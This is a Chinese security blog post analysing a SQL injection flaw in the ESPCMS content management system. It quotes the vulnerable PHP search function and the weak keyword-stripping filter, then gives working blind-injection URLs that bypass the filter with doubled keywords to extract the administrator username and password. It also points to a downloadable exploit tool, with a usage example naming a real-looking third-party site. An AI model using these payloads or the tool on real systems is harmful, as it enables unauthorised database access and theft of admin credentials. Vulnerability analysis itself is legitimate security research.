漏洞:Espcms 通杀 SQL注入漏洞分析附EXP
漏洞作者:Seay
博客:www.cnseay.com
转载请保留以上内容…
官网介绍:
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
漏洞在interface/search.php 文件和interface/3gwap_search.php文件in_taglist()函数都存在,一样的问题,以
interface/search.php为例说明:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 | function in_taglist() { parent::start_pagetemplate(); include_once admin_ROOT . 'public/class_pagebotton.php' ; $page = $this ->fun->accept( 'page' , 'G' ); $page = isset( $page ) ? intval ( $page ) : 1; $lng = (admin_LNG == 'big5' ) ? $this ->CON[ 'is_lancode' ] : admin_LNG; $tagkey = urldecode( $this ->fun->accept( 'tagkey' , 'R' )); $tagkey = $this ->fun->inputcodetrim( $tagkey ); $db_where = ' WHERE lng=' ' . $lng . ' ' AND isclass=1' ; if ( empty ( $tagkey )) { $linkURL = $_SERVER [ 'HTTP_REFERER' ]; $this ->callmessage( $this ->lng[ 'search_err' ], $linkURL , $this ->lng[ 'gobackbotton' ]); } if (! empty ( $tagkey )) { $db_where .= " AND FIND_IN_SET('$tagkey',tags)" ; } $pagemax = 20; $pagesylte = 1; $templatesDIR = $this ->get_templatesdir( 'article' ); $templatefilename = $lng . '/' . $templatesDIR . '/search' ; $db_table = db_prefix . 'document' ; $countnum = $this ->db_numrows( $db_table , $db_where ); if ( $countnum > 0) { $numpage = ceil ( $countnum / $pagemax ); } else { $numpage = 1; } $sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle, color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0, $pagemax "; $this ->htmlpage = new PageBotton( $sql , $pagemax , $page , $countnum , $numpage , $pagesylte , $this ->CON[ 'file_fileex' ], 5, $this ->lng[ 'pagebotton' ], $this ->lng[ 'gopageurl' ], $this ->CON[ 'is_rewrite' ]); $sql = $this ->htmlpage->PageSQL( 'pid,did' , 'down' ); $rs = $this ->db->query( $sql ); while ( $rsList = $this ->db->fetch_assoc( $rs )) { |
由于$tagkey变量使用了urldecode,从而可以绕过GPC,最终
$db_where.=” AND FIND_IN_SET(‘$tagkey’,tags)”;
$tagkey被带入SQL语句。
可以看到下面有
1 | $sql = "SELECT did,lng,pid,mid,aid,tid,sid,fgid,linkdid,isclass,islink,ishtml,ismess,isorder,purview,recommend,tsn,title,longtitle,color,author,source,pic,link,oprice,bprice,click,description,keywords,addtime,template,filename,filepath FROM $db_table $db_where LIMIT 0,$pagemax" ; |
也被带入数据库查询,两条语句可以注入,可以看到第二条SQL语句是可以查询出数据的。但是由于espcms默认配置是不显示SQL语句错误的,而第一条SQL语句查询出来的是count(*),即int,
更蛋疼的是只要第一条查询报错,第二条就不会执行。所以只有用第一条盲注来搞了。
漏洞测试EXP:http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=a%2527
由于espcms本身有防注入函数,在文件
publicclass_function.php inputcodetrim()函数。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 | function inputcodetrim( $str ) { if ( empty ( $str )) return $str ; $str = str_replace ( "&" , "&" , $str ); $str = str_replace ( ">" , ">" , $str ); $str = str_replace ( "<" , "<" , $str ); $str = str_replace ( "<" , "<" , $str ); $str = str_ireplace ( "select" , "" , $str ); $str = str_ireplace ( "join" , "" , $str ); $str = str_ireplace ( "union" , "" , $str ); $str = str_ireplace ( "where" , "" , $str ); $str = str_ireplace ( "insert" , "" , $str ); $str = str_ireplace ( "delete" , "" , $str ); $str = str_ireplace ( "update" , "" , $str ); $str = str_ireplace ( "like" , "" , $str ); $str = str_ireplace ( "drop" , "" , $str ); $str = str_ireplace ( "create" , "" , $str ); $str = str_ireplace ( "modify" , "" , $str ); $str = str_ireplace ( "rename" , "" , $str ); $str = str_ireplace ( "count" , "" , $str ); $str = str_ireplace ( "from" , "" , $str ); $str = str_ireplace ( "group by" , "" , $str ); $str = str_ireplace ( "concat" , "" , $str ); $str = str_ireplace ( "alter" , "" , $str ); $str = str_ireplace ( "cas" , "cast" , $str ); $str = preg_replace( "/<span[^>]+>/i" , "<span>" , $str ); $str = preg_replace( "/<p[^>]+>/i" , "<p>" , $str ); $str = preg_replace( "/<font[^>]+>/i" , "<font>" , $str ); $str = preg_replace( "/width=('|" )?[d%]+('| ")?/i" , "" , $str ); $str = preg_replace( "/height=('|" )?[d%]+('| ")?/i" , "" , $str ); $str = preg_replace( "'<style[^f]*?(/style>)'si" , "" , $str ); return $str ; } |
只是把关键字替换为空,例如union可uunionnion绕过本身防注入,还可以无视不拦截单引号的waf。
猜解用户名长度
http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 1=(seselectlect length(username) frfromom espcms_admin_member limit 1) limit 1– by seay
爆破用户名和密码:
http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=cnseay.com%2527,tags) or did>1 and 97=ascii((seselectlect mid(username,1,1) frfromom espcms_admin_member limit 1)) limit 1– by seay
写了个Exp,下载地址:espcms_exp
使用方法:espcms_exp_by_Seay.exe www.hedysx.com
即可自动爆出表前缀、用户名、跟密码。
评论 (0)